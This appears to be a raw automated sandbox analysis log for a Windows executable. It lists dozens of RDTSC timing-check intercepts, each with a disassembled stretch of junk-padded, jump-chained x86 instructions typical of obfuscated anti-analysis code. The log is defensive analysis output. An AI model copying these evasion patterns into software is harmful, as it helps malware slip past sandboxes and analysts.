Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715050D second address: 7150513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150513 second address: 7150517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150517 second address: 7150583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e pushad 0x0000000f mov cl, 14h 0x00000011 movsx edi, cx 0x00000014 popad 0x00000015 mov dword ptr [esi+08h], eax 0x00000018 pushad 0x00000019 jmp 00007F804C8F2DA6h 0x0000001e pushfd 0x0000001f jmp 00007F804C8F2DA2h 0x00000024 add esi, 6499D7D8h 0x0000002a jmp 00007F804C8F2D9Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov dword ptr [esi+0Ch], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150583 second address: 7150587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150587 second address: 715058B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715058B second address: 7150591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150591 second address: 7150597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150597 second address: 715059B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715059B second address: 71505F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+4Ch] 0x0000000b pushad 0x0000000c mov al, 7Eh 0x0000000e pushfd 0x0000000f jmp 00007F804C8F2DA3h 0x00000014 and ecx, 10822FFEh 0x0000001a jmp 00007F804C8F2DA9h 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [esi+10h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F804C8F2D9Dh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71505F0 second address: 71505F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71505F6 second address: 71505FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71505FA second address: 71505FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71505FE second address: 715060F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715060F second address: 7150613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150613 second address: 7150617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150617 second address: 715061D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715061D second address: 7150637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2DA6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150637 second address: 715063B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715063B second address: 715064C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715064C second address: 7150667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804CF71E87h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150667 second address: 715068F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+54h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715068F second address: 7150693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150693 second address: 7150697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150697 second address: 715069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715069D second address: 71506DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F804C8F2DA0h 0x00000009 adc eax, 5576C7A8h 0x0000000f jmp 00007F804C8F2D9Bh 0x00000014 popfd 0x00000015 mov bx, si 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esi+18h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F804C8F2DA1h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71506DF second address: 71506E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71506E5 second address: 71506E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71506E9 second address: 71506ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71506ED second address: 7150774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b jmp 00007F804C8F2D9Fh 0x00000010 mov dword ptr [esi+1Ch], eax 0x00000013 pushad 0x00000014 mov ebx, esi 0x00000016 mov ch, DDh 0x00000018 popad 0x00000019 mov eax, dword ptr [ebx+5Ch] 0x0000001c pushad 0x0000001d movsx edi, si 0x00000020 mov edx, eax 0x00000022 popad 0x00000023 mov dword ptr [esi+20h], eax 0x00000026 pushad 0x00000027 mov edx, 1119E0DCh 0x0000002c popad 0x0000002d mov eax, dword ptr [ebx+60h] 0x00000030 pushad 0x00000031 movzx ecx, di 0x00000034 popad 0x00000035 mov dword ptr [esi+24h], eax 0x00000038 jmp 00007F804C8F2D9Fh 0x0000003d mov eax, dword ptr [ebx+64h] 0x00000040 pushad 0x00000041 jmp 00007F804C8F2DA4h 0x00000046 mov esi, 6629C9B1h 0x0000004b popad 0x0000004c mov dword ptr [esi+28h], eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F804C8F2DA3h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150774 second address: 71507A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F804CF71E7Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71507A3 second address: 71507B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2D9Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71507B3 second address: 71507D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+2Ch], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 mov esi, 404F1A51h 0x00000015 movzx eax, di 0x00000018 popad 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71507D5 second address: 7150815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov ax, word ptr [ebx+6Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 pushfd 0x00000011 jmp 00007F804C8F2DA9h 0x00000016 sub ah, FFFFFFC6h 0x00000019 jmp 00007F804C8F2DA1h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150815 second address: 715084A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F804CF71E88h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715084A second address: 715084E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715084E second address: 7150854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150854 second address: 715090B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 movsx ebx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ax, word ptr [ebx+00000088h] 0x00000013 pushad 0x00000014 pushad 0x00000015 mov ebx, eax 0x00000017 push eax 0x00000018 pop edi 0x00000019 popad 0x0000001a movzx ecx, dx 0x0000001d popad 0x0000001e mov word ptr [esi+32h], ax 0x00000022 jmp 00007F804C8F2DA7h 0x00000027 mov eax, dword ptr [ebx+0000008Ch] 0x0000002d pushad 0x0000002e jmp 00007F804C8F2DA4h 0x00000033 pushfd 0x00000034 jmp 00007F804C8F2DA2h 0x00000039 jmp 00007F804C8F2DA5h 0x0000003e popfd 0x0000003f popad 0x00000040 mov dword ptr [esi+34h], eax 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007F804C8F2D9Ch 0x0000004a sbb esi, 1D3DAB48h 0x00000050 jmp 00007F804C8F2D9Bh 0x00000055 popfd 0x00000056 mov bl, ch 0x00000058 popad 0x00000059 mov eax, dword ptr [ebx+18h] 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F804C8F2D9Eh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715090B second address: 7150962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c jmp 00007F804CF71E86h 0x00000011 mov eax, dword ptr [ebx+1Ch] 0x00000014 jmp 00007F804CF71E80h 0x00000019 mov dword ptr [esi+3Ch], eax 0x0000001c pushad 0x0000001d mov dl, ch 0x0000001f popad 0x00000020 mov eax, dword ptr [ebx+20h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F804CF71E7Eh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150962 second address: 7150971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150971 second address: 71509A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F804CF71E7Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71509A0 second address: 71509A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71509A6 second address: 71509AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71509AA second address: 71509F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e jmp 00007F804C8F2D9Fh 0x00000013 push 00000001h 0x00000015 pushad 0x00000016 mov edi, ecx 0x00000018 mov ebx, ecx 0x0000001a popad 0x0000001b nop 0x0000001c pushad 0x0000001d mov bl, ah 0x0000001f jmp 00007F804C8F2DA5h 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 mov ecx, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b mov si, di 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71509F2 second address: 7150A5F instructions: 0x00000000 rdtsc 0x00000002 mov esi, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007F804CF71E87h 0x0000000d lea eax, dword ptr [ebp-10h] 0x00000010 jmp 00007F804CF71E86h 0x00000015 nop 0x00000016 jmp 00007F804CF71E80h 0x0000001b push eax 0x0000001c jmp 00007F804CF71E7Bh 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F804CF71E85h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150A5F second address: 7150A65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150ABB second address: 7150B1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 push ecx 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d pushad 0x0000000e mov al, 92h 0x00000010 popad 0x00000011 test edi, edi 0x00000013 jmp 00007F804CF71E87h 0x00000018 js 00007F80BB520A54h 0x0000001e jmp 00007F804CF71E86h 0x00000023 mov eax, dword ptr [ebp-0Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F804CF71E87h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150B1D second address: 7150B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2DA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150B35 second address: 7150B4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150B4E second address: 7150B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150B52 second address: 7150BDC instructions: 0x00000000 rdtsc 0x00000002 call 00007F804CF71E80h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F804CF71E7Bh 0x00000010 add si, A0EEh 0x00000015 jmp 00007F804CF71E89h 0x0000001a popfd 0x0000001b popad 0x0000001c lea eax, dword ptr [ebx+78h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F804CF71E83h 0x00000027 pushfd 0x00000028 jmp 00007F804CF71E88h 0x0000002d jmp 00007F804CF71E85h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150BDC second address: 7150C0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007F804C8F2D9Eh 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov cx, dx 0x00000017 movsx ebx, cx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150C0C second address: 7150C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804CF71E7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150C1E second address: 7150C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150C22 second address: 7150C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F804CF71E83h 0x00000011 mov ecx, 023655DFh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150C47 second address: 7150C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150C4C second address: 7150CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F804CF71E83h 0x00000011 jmp 00007F804CF71E83h 0x00000016 popfd 0x00000017 mov ebx, ecx 0x00000019 popad 0x0000001a lea eax, dword ptr [ebp-08h] 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007F804CF71E7Eh 0x00000026 sbb cl, FFFFFFD8h 0x00000029 jmp 00007F804CF71E7Bh 0x0000002e popfd 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150CA6 second address: 7150CAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150CAA second address: 7150CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, esi 0x00000008 popad 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F804CF71E87h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150CCD second address: 7150CD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150D79 second address: 7150E2B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F804CF71E82h 0x00000008 and ax, 5818h 0x0000000d jmp 00007F804CF71E7Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F804CF71E88h 0x0000001b jmp 00007F804CF71E85h 0x00000020 popfd 0x00000021 popad 0x00000022 test edi, edi 0x00000024 pushad 0x00000025 jmp 00007F804CF71E7Ch 0x0000002a jmp 00007F804CF71E82h 0x0000002f popad 0x00000030 js 00007F80BB52073Ch 0x00000036 pushad 0x00000037 mov cl, 54h 0x00000039 mov di, F79Eh 0x0000003d popad 0x0000003e mov eax, dword ptr [ebp-04h] 0x00000041 jmp 00007F804CF71E85h 0x00000046 mov dword ptr [esi+08h], eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F804CF71E7Dh 0x00000050 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150E2B second address: 7150E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150E49 second address: 7150E5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150E5C second address: 7150E88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F804C8F2D9Fh 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push 00000001h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F804C8F2DA1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150E88 second address: 7150E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150E8E second address: 7150EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov eax, 73B07E91h 0x0000000f jmp 00007F804C8F2D9Eh 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F804C8F2DA7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150EC8 second address: 7150F18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F804CF71E7Fh 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea eax, dword ptr [ebp-18h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F804CF71E80h 0x00000016 and esi, 5D528CA8h 0x0000001c jmp 00007F804CF71E7Bh 0x00000021 popfd 0x00000022 mov ecx, 44F4979Fh 0x00000027 popad 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov di, 4DA2h 0x00000030 mov bx, A1EEh 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150F18 second address: 7150F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150F1E second address: 7150F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150F22 second address: 7150F48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F804C8F2D9Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150F48 second address: 7150F5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150F5D second address: 7150F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F804C8F2D9Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150F82 second address: 7150F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71511DC second address: 715121D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b jmp 00007F804C8F2D9Eh 0x00000010 mov eax, dword ptr [esi+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F804C8F2DA7h 0x0000001a rdtsc
